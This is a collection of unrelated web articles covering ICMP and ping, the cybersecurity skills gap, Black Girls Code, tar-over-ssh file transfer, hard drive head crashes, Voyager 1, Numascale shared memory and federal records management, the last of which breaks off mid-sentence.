IP is not able to provide reliable delivery on its own; some datagrams may be undelivered without any report of their loss back to the sending device. The higher level protocols that use IP must implement their own reliability procedures if reliable communication is required. For instance, many upper-layer protocols, such as HTTP, require the use of a TCP header containing acknowledged sequence numbers to provide reliable delivery. Other higher-level protocols, such as Trivial File Transfer Protocol (TFTP), contain code that provides reliable delivery by the application itself.
It is important to understand that the purpose of ICMP control messages is to provide feedback about problems in the communication environment, not to make IP reliable. With ICMP, there are still no guarantees that a datagram will be delivered or a control message will be returned. The ICMP messages typically report errors in the processing of datagrams. And, fortunately, to avoid an infinite regress of messages about messages etc., no ICMP messages are sent about ICMP messages.
ICMP, which is documented in RFC 792, is a required protocol that is tightly integrated with IP. ICMP messages, delivered in IP packets, are used for out-of-band messages related to network operation. As a paradox, since ICMP uses IP, ICMP packet delivery is, in itself, considered unreliable. As a result, hosts cannot always count on receiving ICMP packets for all network problems. Some of ICMP’s functions are to:
- Announce network errors
- Announce network congestion
- Assist troubleshooting
- Announce timeouts
One of these functions, Assisting Troubleshooting, is referred to as a ping. ICMP provides an Echo function, which sends a packet on a round-trip between two hosts. The ICMP Ping function transmits a series of packets to a destination device and measures the average round-trip times and computes loss of packet percentages. (As an aside, the ICMP ping function is also commonly referred to as the Packet Internet Groper.)
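The round-trip measurement described above is easy to observe with the standard ping utility. Note that sending ICMP Echo requests may require elevated privileges on some systems, and the exact output format varies between implementations:

```shell
# Send four ICMP Echo requests to the loopback address; the summary lines
# report the loss percentage and the min/avg/max round-trip times.
ping -c 4 127.0.0.1
```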
As some of you may have guessed, ping was named after the pulses of sound made by a sonar device, since its operation is analogous to active sonar in submarines. With a sonar system, an operator issues a pulse of energy toward a target – a ping – which then bounces back from the target and is received by the operator. As the name implies, the pulse of energy in sonar is analogous to a network packet in a ping message.
The ping function was developed in December 1983, as a tool for troubleshooting odd behavior on an IP network. It has been hailed over the years as a critical tool in assisting the diagnosis of Internet connectivity issues. However, the usefulness of ICMP ping was reduced in late 2003. With the growth of the World Wide Web, a group of Internet Service Providers began filtering out ICMP Type 8 Echo request messages at their network boundaries.
Unfortunately, this action was necessary because of the increasing use of ping functionality for target reconnaissance using Internet worms such as Welchia. These worms flood the Internet with ping requests to locate new hosts to infect. Not only did the availability of Ping responses leak information to an attacker, it added to the overall load on networks, which caused problems for routers across the Internet.
In addition, although RFC1122 prescribes that any host must accept an echo-request and issue an echo-reply in return, this is now considered a security risk. Thus, hosts that no longer follow this standard are becoming more prevalent on the public Internet and cannot be pinged.
Author: David Stahl | <urn:uuid:eb4bb3a9-4da5-409f-b51b-f77d84026aa1> | CC-MAIN-2017-04 | http://blog.globalknowledge.com/2009/09/30/troubleshooting-with-the-ping-command/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00517-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.943442 | 975 | 3.90625 | 4 |
What do the FBI, Trump’s hotel chain, Sony, and JP Morgan Chase all have in common? They are all companies that were hacked in 2014 and 2015, each one a reminder to the rest of us that no one is immune to the threat of criminal hackers. Just this October, a cyber attack disrupted PayPal, Twitter, Spotify, and multiple other websites.
Cyber attacks damage not only a company’s reputation, but also its bottom line. One study suggested the average cost of a data breach in 2015 was $3.8 million. As the costs of data breaches climb, so too does the demand for cyber security experts.
Unfortunately, too many companies are coming up short in their search for skilled professionals to help protect them from cyber attack. A study conducted by Intel Security with the Center for Strategic and International Studies (CSIS) found that more than 80% of IT organizations in eight countries face a shortage of workers who specialize in cyber security.
In other words, there is a serious skills gap in cyber security.
Where did this gap come from? Given the short supply of cyber security talent, how can companies find the cyber security skills they need?
The Cybersecurity Skills Gap Leaves Us Vulnerable
“The deficit of cyber security talent is a challenge for every industry sector. The lack of trained personnel exacerbates the already difficult task of managing cyber security risks,” according to the CSIS report.
The current shortage of cyber security skills is concerning for companies in all industries. One in four of the IT professionals surveyed said their organizations had been victims of cyber theft because of their lack of qualified workers.
It is estimated that by 2019, between one and two million cyber security positions will be left unfilled. In the United States alone, 209,000 cyber security positions sat vacant in 2015 because of the shortage of cyber security skills.
Hackers are taking notice of this gap. Worryingly, 33% of respondents to the Intel Security-CSIS survey said their organization was a target for hackers who knew their cyber security was not strong enough.
Origins of the Cybersecurity Gap
With the risks and damages of cyber attacks increasing every year, it stands to reason that we’d see an equal increase in trained professionals ready to combat these attacks. It’s clear that hackers are advancing their skills and methods quickly, so why are we struggling to find skilled cyber security experts?
Numerous factors have led to the skills shortage, but the two most prominent lie in the shortcomings of educational programs and insufficient government policies.
While the United States has many cyber security programs in top universities, this is not enough to overcome the challenges in the education field. It is difficult for IT programs at universities and vocational programs to keep up with the rapid pace of change within the IT field.
As a result, only 23% of IT professionals believe education programs fully prepare cyber security professionals for the industry, says the CSIS report. That means fewer than one in four believe graduates leave school adequately prepared to go up against today’s cyber threats.
The second factor is related to the first. The insufficiencies of our educational programs are in part due to the fact that governments aren’t investing enough in cyber security education. More than three in four IT professionals agreed that their government needs to invest more in building cyber security talent.
Neither have governments crafted sufficient laws and regulations for cyber security. More than half of IT professionals surveyed said the cyber security laws in their country could be improved.
Together, inadequate education and government policy concerning cyber security have helped create the skills gap we see today. Highly technical skills are most in demand, with the following three cited most often: intrusion detection, secure software development, and attack mitigation.
“Conventional education and policies can’t meet demand,” declares the Intel Security-CSIS study. “New solutions are needed to build the cyber security workforce necessary in a networked world.”
Fortunately, it’s not hard to see what some of these solutions should be.
Finding Ways To Fill the Gap
Given its severity, it will take real commitment to address the shortage of cyber security skills. Here are a few good places to start.
Education and training solutions
As traditional academic programs fail to impart necessary cyber security skills, workers and employers are addressing the skills gap through unconventional education methods.
As one example, AT&T and Udacity offer a “nanodegree,” which promises to provide “industry credentials for today’s tech job” through courses on information security, building secure servers, and more.
Within academia, current cyber security programs should pivot to provide more hands-on experience and training. A traditional lecture can only go so far in preparing students for working in the cyber security field; real-world experience makes a huge difference. Many companies have already begun incorporating ongoing cyber security education and training into the workplace.
This training is important for staff retention, too. Nearly half of survey participants said a lack of training, or of sponsorship for certification programs, was a common reason for employees to leave their organization. The cost of outside training is often too high for employees to pay on their own. Companies who are willing to foot the bill for these costs have an advantage in attracting and retaining cyber security talent.
It’s time for governments to take the skills gap more seriously, and that means investing in cyber security and updating cyber security laws.
According to Intel Security-CSIS, another important step is to collect more national data and standardize the taxonomy for cyber security job functions. Currently, a lack of data makes it difficult to develop targeted cyber security policies and measure their effectiveness.
Relying on outsourcing
Unfortunately for the thousands of companies in need of cyber security skills, there’s no immediate fix. In the long run, government investment and nimbler academic programs are necessary to close the gap in cyber security skills.
These solutions will take time, and until then, many companies are responding to in-house talent shortages by outsourcing cyber security work. More than 60% of survey respondents worked at organizations that outsourced at least some cyber security work. They most often outsourced risk assessment and mitigation, network monitoring and access management, and repair of compromised systems.
For many companies, outsourcing is the only way to get the cyber security skills they desperately need. The skills shortage has driven up the value of in-house cyber security employees, with the median cyber security salary nearly three times the average wage according to the CSIS survey. In the United States, cyber security jobs pay an average of $6,500 more than other IT professions.
Big cyber security spenders -- like the United States government and the financial services industry -- may be able to pay the rates cyber security professionals demand, but other organizations will struggle to do so. For these organizations, outsourcing may be their best option.
In time, academic programs and government policy can catch up to the growing demand for cyber security skills, and it’s essential that nations devote resources to these goals. For now, if companies don’t have the skills they require, third-party cyber security firms offer the best chance at protecting them from the ever-present threat of cyber attack. | <urn:uuid:bdcadfba-ac78-4d88-8eab-0e9c2017d5cb> | CC-MAIN-2017-04 | http://www.cio-today.com/article/index.php?story_id=030002OAXIX0 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00335-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.955079 | 1,495 | 2.71875 | 3 |
Computer science careers haven’t traditionally been geared toward women or non-white subcultures. Kimberly Bryant is changing that. She founded Black Girls Code, an organization that hosts events in major cities around the U.S. and internationally to teach girls of color about computer programming. Bryant’s goal is to reach 1 million girls between the ages of 7 and 17 by 2040.
“One of the most important things is to plant that seed of interest because [our students] don’t generally have any knowledge of computer programming or computer science before they come into our classes,” she said.
The opportunities provided by Black Girls Code fight against the marginalization of women and minorities in an increasingly technological world, Bryant said — even better, these skills can empower women of color to become technology leaders.
Founded in 2011, the nonprofit gained immediate moral and financial support from individual donors such as Craig Newmark, founder of Craigslist, as well as notable organizations like the Kapor Center for Social Impact. Two years of crowdfunding through Indiegogo has yielded about 3,000 supporters and $130,000.
Donations allow Black Girls Code to run events centered on topics like robotics, game and mobile app development, and Web design. The organization also hosts boot camps for older students where they can work alongside engineers at companies like Twitter and gain first-hand experience of what it’s like to develop real technologies used the world over. | <urn:uuid:fd6d48fc-707a-4036-8ddd-cffce7286b09> | CC-MAIN-2017-04 | http://www.govtech.com/top-25/Kimberly-Bryant-2014-GT-Top-25-Winner.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281084.84/warc/CC-MAIN-20170116095121-00059-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952772 | 296 | 3.046875 | 3 |
Once upon a time, data, information, values, and lessons were all communicated by spoken word. Narrative was used to encode and shape data, quality control the transmission of the message, and keep the story alive.
That's the simple version. Dr Katherine O'Keefe is an expert in the use of fairy tales and the narrative patterns of folklore in literature. She uses these skills to help data governance clients figure out why their data-driven happy ending hasn't happened yet.
What you will learn:
The links between fairy tales and data management taxonomies
The differences between fairy tales and parables and the narrative patterns that drive good yarns
The link between stories, communication, and change management
How to reinterpret classic narratives to teach valuable data governance lessons. | <urn:uuid:c0e32775-1066-40f9-81f8-533479fb25bb> | CC-MAIN-2017-04 | https://www.brighttalk.com/channel/12405/dama | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00023-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.929635 | 162 | 2.890625 | 3 |
Therefore, analysts need tools that allow them to freely explore and investigate data. Incorporating more data sets in the analysis should be very easy, there should be no need to specify a goal beforehand, and it must be possible to analyze data in an unguided way.
Besides all the more standard features such as displaying data as bar charts, in dashboards, on geographical maps, the perfect tool for this type of work should support at least the following characteristics:
- No advance preparations: There should be no need to predefine data structures of the analysis work in advance. If data is available, it should be possible to load it without any preparations, even if it concerns a new type of data.
- Unguided analysis: Analysts should be able to invoke the analysis technology without having to specify a goal in advance. The exploration technology should allow for analyzing data in an unguided style.
- Self-service: Analysts should be able to use the analysis techniques without help from IT experts.
CXAIR internally organizes all the data using an intelligent index. In fact, internally it's based on text-search technology. This makes it possible to combine and relate data without any form of restriction, which is what analysts need.
Unlike most analysis tools, CXAIR uses search technology that speeds up data analysis. For calculations, a mixture of in-memory and on-disk caching is used to analyze massive amounts of data at search-engine speeds. All the loaded data resides on the server, which provides a thin-client web interface. In other words, no data is loaded on the client machine. Numbers are cached on the server, but text is not. The fact that CXAIR doesn't cache all the data means that available memory is not a restriction. Cache is used to improve performance; a large internal memory is not a necessity, but it will help performance, particularly for ad-hoc calculations.
CXAIR is clearly a representative of a new generation of reporting/analysis tools that users can deploy to freely analyze data. It's a tool for self-service discovery and investigation of data. It's the tool that many data scientists have been waiting for and is worth checking out.
Posted December 10, 2013 6:52 AM
Network File Transfer With On-the-fly Compression
We often transfer a large number of files, or large files, over the network from one computer to another. FTP is the default choice for transferring a few files, and SCP is the typical choice for transferring a large number of files.

If you happen to transfer files from one computer to another over a slow network (such as copying files from a home computer to the office, or vice versa), then the following tip might be helpful. This technique works as follows:
1) Performs on-the-fly compression of files at source computer.
2) Transfer the compressed files over the network.
3) Performs on-the-fly decompression of the files at the target computer.
This technique uses just SSH and TAR commands without creating any temporary files.
Let us call the source computer HostA and the target computer HostB. We need to transfer a directory (/data/files/) with a large number of files from HostA to HostB.
1) Command without on-the-fly compression
Run this command on HostB
# scp -r HostA:/data/files /tmp/
This command recursively copies the /data/files directory from HostA to HostB.
2) Command with on-the-fly compression
Run this command on HostB
# ssh HostA "cd /data/; tar zcf - files" | tar zxf -
This command recursively copies /data/files from HostA to HostB, and it is a lot faster on a slow network.
Let us take a look at this command in detail:
1) ssh HostA "..." : From HostB, connect to HostA via SSH.
2) cd /data/ : On HostA, switch to the directory /data/.
3) tar zcf - files : Tar the 'files' directory with compression and send the output to STDOUT.
4) | : Pipe(|) STDOUT from HostA to STDIN of HostB.
5) tar zxf - : On HostB, decompress and untar the data coming in through STDIN.
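To get comfortable with the pattern before pointing it at a real remote host, you can exercise the same compress-pipe-decompress pipeline entirely locally (the /tmp paths below are just illustrative):

```shell
# Create a small demo tree (illustrative paths only).
mkdir -p /tmp/tarpipe-demo/src /tmp/tarpipe-demo/dst
echo "hello" > /tmp/tarpipe-demo/src/sample.txt

# Same pattern as the ssh version, minus the network hop:
# compress to STDOUT on one side, decompress from STDIN on the other,
# with no temporary archive file written to disk.
(cd /tmp/tarpipe-demo && tar zcf - src) | (cd /tmp/tarpipe-demo/dst && tar zxf -)

cat /tmp/tarpipe-demo/dst/src/sample.txt   # prints "hello"
```

Once this works locally, swapping the left-hand subshell for the ssh invocation above turns it back into the network version.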
To show how useful this technique is, we transferred 45 MB worth of files from HostA to HostB over a DSL connection. Here are the results:
1) No compression method: 12min 59 sec
2) On-the-fly compression method: 2min 33 sec
This method will be effective with uncompressed large files or directories with a mix of different files. If the transferred files are already compressed then this method won’t be effective. | <urn:uuid:5d6396eb-ae72-401e-99b5-1c14af980e6a> | CC-MAIN-2017-04 | https://www.getfilecloud.com/blog/network-file-transfer-with-on-the-fly-compression/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00325-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.781516 | 621 | 3.125 | 3 |
One important question clients ask when considering data recovery is: “How likely will a successful data recovery be?”
For us, the answer depends mostly on whether or not the data still exists. That seems obvious in hindsight.
But First, How Is the Data Stored?
The data on a hard drive is stored on one or more hard discs, or platters, made of glass or aluminum. These platters are coated with an extremely thin mirror-like coating of magnetic material. This surface has tiny individual areas, each of which has two possible states.
The state is changed by the hard drive’s read/write heads when a small electrical field is applied, creating an incredibly dense matrix of magnetized or unmagnetized spots — 1’s and 0’s. That’s your data. On a basic level, this data is stored using electromagnetism.
The magnetic material on the platters is delicate. Under normal operation, the read/write heads are positioned over the platter by an arm (picture the arm on a record player), but they move quickly across the platter without contacting the platter surface.
Instead, they float on an extremely thin — as in 3-5 nanometers — cushion of air. To give a sense of scale, an oxygen molecule is about a third of a nanometer.
When the hard drive spins up, the motion of the platters creates airflow. The read/write head assembly is designed roughly like a small wing and the airflow generated inside the drive lifts the heads off the platter. So I guess indirectly, we can thank the Wright Bros. for their help in developing modern hard drives (and we can directly thank IBM for inventing the first hard drive in 1956).
When Worlds Collide (and Heads Crash)
In some situations, the read/write head loses lift and crashes onto the platter surface. This action is commonly referred to as a head crash. In most situations, the head will briefly make contact, immediately lift back up, and the drive will go on working with no noticeable impact to the user.
Unfortunately, sometimes a head crash damages the head. Instead of lifting back up, the heads may remain in contact with the delicate platter surface.
The platter spins at some constant, high rotational speed. A common rotational speed is 7,200 revolutions per minute, but drives range from 5,400 to 15,000 rpm. This rotational velocity combined with contact from the heads is what causes rotational scoring.
When that magnetic material gets scored, the magnetic coating is turned to dust. The data it carried is lost. All those 1’s and 0’s, all that potentially precious information, gone forever.
In extreme cases of rotational scoring, we have seen large portions of laptop hard drive platters exposed as bare glass. This means that nearly all the magnetic material from a vast portion of the drive has been scratched off by the read/write head.
Some minor rotational scoring can be overcome by advanced techniques to recover data elsewhere on the drive’s platters. Unfortunately, any significant scoring is very likely to remove key parts of metadata necessary to make sense of the remaining binary code.
Rotational scoring also creates an uneven surface on the platter, meaning even if you replace a damaged read/write head, the new one can become damaged again by slamming into the uneven portions of the platter. Fortunately, our handy-dandy (and state-of-the-art) burnishing machine can help mitigate this problem.
In summary, if your hard drive experiences some rotational scoring, it might not be the end of the world. The data may still be recoverable, in which case please feel free to get in touch with us.
Just try not to move, kick, or drop a hard drive while it’s operating and you’ve greatly improved your chances of avoiding rotational scoring. | <urn:uuid:c5f80d01-91e8-4a1a-ab17-88f6fe82f43b> | CC-MAIN-2017-04 | https://www.gillware.com/blog/data-recovery/barriers-to-hard-drive-data-recovery-rotational-scoring/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00445-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.921289 | 816 | 3.328125 | 3 |
England – University of Southampton researchers have been able to produce optical fibers capable of transferring data at 99.7% of the speed of light in a vacuum. What kind of data transfer speeds does that equate to? Well, roughly 10 terabytes per second. To put that into perspective, today's typical fiber optic links carry only about 40 gigabits per second. With such a dramatic increase, I wonder when I'll be able to get this installed at my house. Haha.

How did the researchers make this a reality? Well, their fibers are hollow and filled with air. This makes the fibers very fragile and difficult to bend or route around corners. To solve this problem, they used a photonic-bandgap rim on the inside of the fiber, which enables low loss and low latency. The researchers don't expect this to replace standard fiber anytime soon, but for small datacenter applications it would provide an incredible speed boost.
Callbacks are extremely commonplace in computer programming. I'm kinda
shocked at seeing not one but multiple people in this thread saying that
they don't even know what a callback is.
Exit programs are an example of a callback. You give the system the name
of a program, and it calls it at a particular time.
Triggers are another.
The %HANDLER routines used by XML-SAX or XML-INTO are callbacks.
APIs like Qp0lProcessSubtree(), QaneSava, QaneRsta use callbacks.
They are utterly ubiquitous; you can't sneeze without using a callback.
You should definitely take the time to learn about them.
On 10/15/2012 3:50 PM, Richard Reeve wrote:
Has anyone ever heard of a callback as it is related to the IBM i? I was asked to explain a callback during an interview and I'd never even heard of it. Can any of you explain to me what a callback is and how it is used? I tried google but didn't get a good explanation. | <urn:uuid:112abd58-5b28-4280-a90c-f28497187267> | CC-MAIN-2017-04 | http://archive.midrange.com/midrange-l/201210/msg00640.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00400-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.949451 | 231 | 2.65625 | 3 |
NASA's Voyager 1 has journeyed farther from Earth than any other man-made object, but there's a debate about exactly how far it's gone and whether it's actually left our solar system.
In June, NASA reported that the 36-year-old Voyager, which launched on Sep. 5, 1977 to study the outer Solar System and interstellar space, had traveled more than 11 billion miles from the sun and was nearing the edge of the solar system and interstellar space.
However, a team of researchers from the University of Maryland yesterday reported that the spacecraft has already left the solar system and entered interstellar space - or the space between star systems in a galaxy. "It's a somewhat controversial view, but we think Voyager has finally left the Solar System, and is truly beginning its travels through the Milky Way," said Marc Swisdak, a research scientist at the University of Maryland.
Voyager 1, according to university researchers, has begun the first exploration of our galaxy beyond the Sun's influence.
The scientists have created a model of the outer edge of our solar system and say the data coming back from Voyager fits what they would expect to see in that model.
NASA officials could not be reached for comment.
However, less than two months ago, NASA said Voyager 1 was believed to be near the edge of the heliosphere, which basically is a bubble around the sun. The spacecraft is so close to the edge of the solar system that it now is sending back more information about charged particles from outside the solar system and less from those inside it, according to the space agency.
"This strange, last region before interstellar space is coming into focus, thanks to Voyager 1, humankind's most distant scout," Ed Stone, Voyager's project scientist at the California Institute of Technology, said in an earlier statement. "If you looked at the cosmic ray and energetic particle data in isolation, you might think Voyager had reached interstellar space, but the team feels Voyager 1 has not yet gotten there because we are still within the domain of the sun's magnetic field."
NASA noted that its scientists don't know exactly how far Voyager 1 needs to travel to enter interstellar space. It could take a few months or even years.
Researchers from the University of Maryland, however, say they believe Voyager left our solar system a little more than a year ago.
The issue revolves around how scientists detect the edge of our solar system. The university noted the conventional view is that that scientists will know it's passed through this mysterious boundary when Voyager stops seeing solar particles and starts seeing galactic particles, along with a change in the prevailing direction of the local magnetic field.
Researchers say that NASA isn't taking into consideration that the border of the heliosphere is very uneven and magnetic field lines become confusing and variable when the magnetic fields of the sun and of interstellar space connect.
Part of Voyager 1's mission is to measure the size of the heliosphere.
Scientists are eager to see what the spacecraft will find in interstellar space, which is believed to be filled with star particles.
Voyager 1 launched with its twin spacecraft, Voyager 2. Both have flown past Jupiter, Saturn, Uranus and Neptune. In 1990, they embarked on a mission to enter the interstellar region. Voyager 2 is currently just 9 billion miles away from the sun, according to NASA.
Scientists are debating whether Voyager 1 has entered interstellar space or is still in our solar system. (Image: NASA)
Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is email@example.com.
This story, "Voyager 1, where are you?" was originally published by Computerworld. | <urn:uuid:541a0771-f963-474a-a002-45f2904d852b> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2170017/data-center/voyager-1--where-are-you-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00308-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.944619 | 843 | 3.765625 | 4 |
Current computer architectures have developed along two different branches, one with distributed memory with separate address domains for each node with message passing programming model and another with global shared memory with a common physical address domain for the whole system. The first category is present in massively parallel processors (MPPs) and clusters and the latter is present in the common servers, workstations, personal computers and symmetrical multiprocessing systems (SMPs) through multicore and multi-socket implementations. These two architectures represent distinctly different programming paradigms. The first one (MPP) requires programs that are explicitly written for message passing between processes where each process only has access to its local data. The second category (SMP) can be programmed by multithreading techniques with global access to all data from all processes and processors. The latter represents a simpler model that requires less code and it is also fully equivalent with the architecture and programming model in common workstations and personal computers used by all programmers every day.
Since clusters are composed of general purpose multicore/multisocket processing nodes, these represent a form of a hybrid of the two different architectures described above.
Numascale’s approach to scalable shared memory
Numascale’s NumaConnect extends the SMP programming model so that it can be scaled up by connecting a large number of standard servers (up to 4096 with the current implementation) as one global shared memory (GSM) system. Such a system provides the same easy-to-use environment as a common workstation, but with the added capacity of a very large shared physical address space and I/O, all controlled by a single-image operating system. This means that programmers can enjoy the same working environment as their favorite workstation, and system administrators have only one system to manage instead of the bunch of individual nodes found in a cluster. In addition, the SMP model allows efficient execution of message passing (MPI) programs by using shared memory as the communication channel between processes.
Distributed vs shared memory
In distributed memory systems (clusters and MPPs), processors residing on different nodes have no direct access to each other’s memories (or I/O space). Data on a different node cannot be referenced directly by the programmer through a variable name, as it can in a shared memory architecture. This means that data to be shared or communicated between processes must be handled through explicit programming, by sending the data over a network. This is normally done through calls to a message passing library (like MPI) that invokes a software driver to perform the data transfer. The data to be sent was most probably produced by the sending process, so it resides in one of the caches belonging to the processor that runs the process. This will normally be the case, since most MPI programs tend to communicate through relatively short messages, on the order of a few bytes per message. The communication library will need to copy the data to a system send buffer and call the routine to set up a DMA transfer by the network adapter, which in turn will request the data from memory and transfer it to a buffer on the receiving node. All in all, this requires a number of transactions across system datapaths, as depicted in Figure 1.
Figure 1, Message passing with traditional network technology, showing sending side only
In a shared memory machine, referencing any variable anywhere in the entire dataset is accomplished through a single standard load register instruction. For the programmer, this is utterly simple compared to the task of writing the explicit MPI calls necessary to perform the same task.
The same operation for sending data, in the case of running a message passing (MPI) program on a shared memory system, only requires the sender to execute a single store instruction (preferably a non-polluting store instruction, to avoid local cache pollution) to send up to 16 bytes (the maximum amount of data for a single store instruction in the x86 instruction set as of today). The data will be sent to an address that points to the right location in the memory of the remote node, as indicated in Figure 2.
Figure 2, Message Passing with shared memory, both sender and receiver shown
Numascale’s technology is applicable for applications with requirements for memory and processors that exceed the amount available in a single commodity unit. Applications for servers that can benefit from NumaConnect span from HPC applications with requirements for 10-20TBytes of main memory for seismic data processing with advanced algorithms through applications in life sciences to Big Data analytics.
NumaConnect systems are available from system integrators world-wide, based on the IBM x3755 server and the Supermicro 1042 or 2042 servers. Numascale operates a demo system where potential customers can run their tests. See the Numascale website http://numascale.com for details; the request form for access to the demo system is http://numascale.com/numa_access.php.
Why its Crucial to Start Unifying Physical and Electronic Records Now
Unifying the record management process is not just about indexing and filing records in a legally compliant fashion. Instead, agencies know it also involves facilitating the ability to locate and review information in order to make faster, more efficient decisions. In turn, agencies recognize that a solid management process empowers them to achieve their goals.
Federal agencies have reached an information management ‘tipping point.’ The Presidential Directive on Managing Government Records, in addition to the ‘Freeze the Footprint’ mandate, FOIA and information-centered initiatives such as the Open Data Policy, have provided federal organizations with a new set of challenging guidelines for putting records in order.
These mandates — combined with the explosive growth of electronic records — are driving federal agencies to seek solutions that can unify the management of both physical and electronic documents. According to industry research, the amount of data being created and stored by organizations is doubling every two years, despite having already reached staggering proportions.1 In today’s day and age, humans are creating as much data every ten minutes as was amassed by all of mankind from the beginning of recorded time through to 2003.2
For many organizations, the challenges of information management seem overwhelming. Federal agencies are trying to balance ever-expanding record volumes against flat or shrinking budgets, while simultaneously racing to meet mandates that require a fundamental shift in how information is stored, accessed and managed. There is also an understanding that unifying the record management process is not just about indexing and filing records in a legally compliant fashion. Instead, agencies know it also involves facilitating the ability to locate and review information in order to make faster, more efficient decisions. In turn, they recognize that a solid management process empowers them to achieve their goals.
At the same time, most government organizations also fully understand that digitizing everything is neither fiscally responsible nor practically viable. They realize that managing both paper and digital records in a unified framework makes the most sense, from both a fundamental and an economic perspective. Agencies therefore know that marrying these two types of records under a single information governance plan is crucial to meeting federally mandated goals.
Federal records and information management
Fewer than 1 in 5 federal records management professionals say they are completely prepared to handle the growing volume, velocity and variety of federal records.
A majority of those surveyed also cited a need for more training and budgetary dollars to help agencies meet federally-mandated records management objectives.
92% of respondents believe their agency must take further steps to meet the Presidential Directive deadlines.
Despite the advantages of the Presidential Directive, nearly half (46%) either do not believe or are unsure whether the deadlines are realistic or obtainable.5
Such a unified approach can allow organizations to apply consistent policy management and enforcement to all records agency-wide, no matter where these records may be located, what format they may take or how they were initially created. According to agency respondents surveyed in NARA’s latest self-assessment report, policy enforcement could indeed be made easier if all records were combined under a single set of procedures and a streamlined management oversight system.3
Although federal agencies are now required to get their records management processes under control, fewer than 1 in 5 records management professionals surveyed in late 2013 reported being completely prepared to handle the growing volume, velocity and variety of federal records. According to the results of a MeriTalk survey of 100 federal records and information management professionals, almost half (46%) of respondents either did not believe, or were unsure whether, the Presidential Directive goals were realistic or obtainable. Not surprisingly, a majority of those surveyed also cited a need for more training and budgetary dollars to help agencies meet federally mandated records management objectives.4
Major Deadlines Within the Presidential Directive on Managing Government Records
All records must be inventoried to ensure permanent records more than 30 years old are reported to NARA, and all unscheduled records stored at NARA must be identified as well.
Plans must be developed and implemented to transition necessary permanent records to digital formats.
Records Management (RM) training must be established to inform employees of the new responsibilities, policies and laws.
Enterprise content management plans must be built out to ensure electronic transfer to NARA’s Electronic Records Archives (ERA) when ready.
Both permanent and temporary email records must be managed in an accessible electronic format.
All electronic permanent records must be stored/managed in electronic format.
Ongoing requirements call for RM to be incorporated into cloud strategies and solutions at some point in the future.
Digital records growth:
One big challenge agencies face in unifying information management is coming to terms with the rapid growth of electronic records. If such records are not tagged properly, they multiply and continue to create headaches, particularly when there is a FOIA or e-Discovery request in place or if some other regulatory compliance practice is required.
Understanding the impact of social media:
Government agencies are similarly burdened by the more specific growth of social media and the inherent changes to information management such growth can cause. Just a few years ago, industry surveys indicated that up to 50% of managers were unaware their organizations were legally liable for social media content. Yet the bottom line is: they are.
Deciphering who’s in charge:
This is where management and cultural issues come into play. The IT department may be in charge of storing electronic records, but it may not necessarily be in charge of compliance or policy management. IT and RM executives must therefore work together to establish their proper roles in achieving both consistent compliance and the modernization of key RM processes.
Managing legacy records:
A unified approach can also help agencies address the management and disposal of retired paper records. With unification, the agency in question is required to inventory and benchmark its information assets, regardless of the format or location of its records, thus allowing for easy access and retrieval. This unified effort can also help determine which paper records to digitize and which to keep in paper form.
Why Unify Records Now?
While the concept of unified records management is not new, the pressure to achieve unification has intensified in recent years. This is largely due to the current administration’s ongoing efforts to promote greater transparency and better information oversight. In addition, key deadlines intended to drive agencies toward the digitization and streamlining of records management practices are already upon us. In fact, the mandatory first step, a deadline requiring agencies to identify all permanent records in existence for more than 30 years, has already passed: Dec. 31, 2013. According to a December 2013 MeriTalk survey, just over half (54%) of records managers expected to be able to meet this first major requirement on that date. What’s more, 92% of respondents believed their agencies must take extra measures to meet the directive deadlines. Yet the longer agencies delay in getting started, the more difficult it will be to keep pace with continually evolving federal mandates.
For federal agencies today, one of the biggest challenges implicit in unifying information is the building of a solid foundation — a foundation that starts with establishing a single, consistent system of record. On the next page are steps for getting started.
Benefits of Unified Records Management
By deploying a comprehensive unified solution to address records management, agency records officers and IT professionals gain the ability to:
- Reduce risks inherent in managing information in multiple formats across a variety of locations for end users with different access needs.
- Lower costs by reducing the total amount of data stored, and likewise by enabling records managers to make better, more informed decisions about which records to store in digital formats and which to store on paper.
- Respond quickly and comprehensively to changes in FOIA and e-Discovery compliance requirements as they arise, resulting in reduced costs and reduced risks to the organization.
Reframing the Challenge
Much like the unification of physical records, the unification of electronic records is largely focused on improving the way in which key policies are applied. Many organizations in both the private and public sectors find that it’s helpful to re-apply the skills and knowledge gained from unifying physical documents when creating a new electronic system. While such cross-pollinating can be useful, Iron Mountain advises federal agencies to take a measured approach and suggests organizations keep in mind the innate differences between managing physical documents and overseeing digital records when creating an information management plan.
In reframing the challenges involved in unifying records management, agencies need to be able to:
- Apply policies, retentions and holds uniformly across all record formats.
- Classify records of all types upon creation for efficiency, consistency and defensibility.
- Enable users to find the records they need quickly and efficiently.
- Speed up e-Discovery and FOIA searches using both an integrated platform and a system of reliably classified records.
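To illustrate the first two points, here is a minimal, purely hypothetical Python sketch of a unified retention check: one schedule, keyed by record series, applied identically to paper and electronic records. The series names and retention periods below are invented for illustration and do not reflect any real agency schedule.

```python
from datetime import date

# One retention schedule, keyed by record series -- applied to every
# record regardless of format (paper or electronic).
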